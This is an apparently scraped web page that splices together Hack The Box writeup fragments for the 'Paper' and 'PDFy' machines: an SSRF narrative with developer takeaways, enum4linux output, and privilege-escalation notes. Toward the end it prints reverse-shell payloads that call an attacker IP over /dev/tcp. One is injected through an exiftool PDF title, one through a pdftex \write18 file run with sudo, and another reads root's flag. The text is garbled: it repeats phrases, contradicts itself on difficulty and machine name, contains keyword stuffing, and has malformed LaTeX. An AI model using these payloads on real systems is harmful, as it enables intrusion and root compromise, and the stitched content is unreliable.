machine is an easy-difficulty Linux box. A high-quality writeup (or "paper") for this machine should follow a professional structure similar to the official HTB sample report Enumeration : Document the scan identifying ports 22, 80, and 443. Vulnerability Discovery : Note the X-Backend-Server header which reveals the office.paper hostname. Mention using to find vulnerabilities in the WordPress site. : Explain the discovery of the chat.office.paper
subdomain and the use of the "recyclops" bot to read local files (LFI). Privilege Escalation : Detail the exploit for CVE-2021-3560 (Polkit) to gain root access. InfoSec Write-ups 2. HTB "PDFy" Web Challenge
is a challenge focused on Server-Side Request Forgery (SSRF) and Local File Inclusion (LFI) via a PDF generation tool. HacktheBox Writeup: Paper - InfoSec Write-ups
The world of Hack The Box is often a race against time, logic, and the silent hum of a remote server. This story follows a security researcher’s journey through the "Pdfy" machine, a challenge that turns a simple PDF generator into a gateway for internal network exploration. The Entry Point
The mission began with a simple web interface. It was a tool designed to take a URL and convert the webpage into a downloadable PDF. On the surface, it seemed helpful—a utility for archiving web content. But to a pentester, every input field is a question. If the server fetches a URL to render it, what else can it be made to fetch? The Discovery of SSRF
The first breakthrough came from testing the boundaries of that URL input. By pointing the tool toward a local loopback address, the researcher confirmed a Server-Side Request Forgery (SSRF) vulnerability. The server wasn't just fetching public websites; it was willing to talk to itself. : Lack of input validation on the submitted URL.
: Use the server as a proxy to peek into the internal network. The Redirect Maneuver pdfy htb writeup upd
The server had some defenses. It blocked direct attempts to access internal metadata services. To bypass this, the researcher hosted a small script on their own machine. This script didn't provide content; it simply sent a 302 Redirect
header. When the Pdfy server visited the researcher's URL, it followed the redirect blindly, bypassing the initial filters and successfully hitting the internal target. Exfiltration via PDF
The "Aha!" moment occurred when the generated PDF arrived. Inside the document wasn't a webpage, but the raw response from an internal service. By manipulating the SSRF, the researcher could now "read" internal files and services by proxy, effectively turning the PDF generator into a remote file viewer. Key Takeaways for Developers
Preventing vulnerabilities like those found in Pdfy requires a multi-layered defense: Allowlisting : Only permit requests to specific, trusted domains. Protocol Restriction : Block non-HTTP protocols like Network Isolation
: Ensure the application server cannot reach sensitive internal metadata or management IPs. Response Validation
: Check the content type and size of the fetched data before processing it. Security Checklist 🛡️ Identify the PDF generation engine (e.g., wkhtmltopdf). Test for local file inclusion using file:///etc/passwd machine is an easy-difficulty Linux box
Use URL encoding or redirects to evade basic string filters.
Verify SSRF by receiving a "hit" on a controlled listener (like Webhook.site).
This journey through Pdfy serves as a classic reminder: never trust user-supplied URLs, and always assume that if your server can see it, an attacker can too.
In /home/john/user.txt
Enumerating the NetBIOS and Microsoft-DS ports using enum4linux reveals a list of users on the system.
$ enum4linux -u nobody -p 10.10.11.206
[+] Enumerated users
user:[pdfy] uid:[1677721600] gid:[1677721600] groups:[1677721600]
user:[phr] uid:[1677721601] gid:[1677721601] groups:[1677721601]
| Attribute | Details | |-----------|---------| | Name | PDFY | | OS | Linux | | Difficulty | Medium | | Release Date | 2021 (approx) | | IP Address | 10.10.10.x (varies) | Reverse Shell Crafted PDF with title: exiftool -Title='test;
Crafted PDF with title:
exiftool -Title='test; bash -c "bash -i >& /dev/tcp/10.10.14.xx/4444 0>&1";' shell.pdf
Upload → reverse shell as www-data.
pdftex allows \write18 to execute shell commands if enabled.
Create a malicious .tex file:
\immediate\write18cat /root/root.txt > /tmp/root.txt
\bye
Run:
sudo /usr/bin/pdftex -shell-escape exploit.tex
Now read /tmp/root.txt – that’s your RPD.
Alternatively, get a root shell:
\immediate\write18/bin/bash -c "bash -i >& /dev/tcp/10.10.14.XX/5555 0>&1"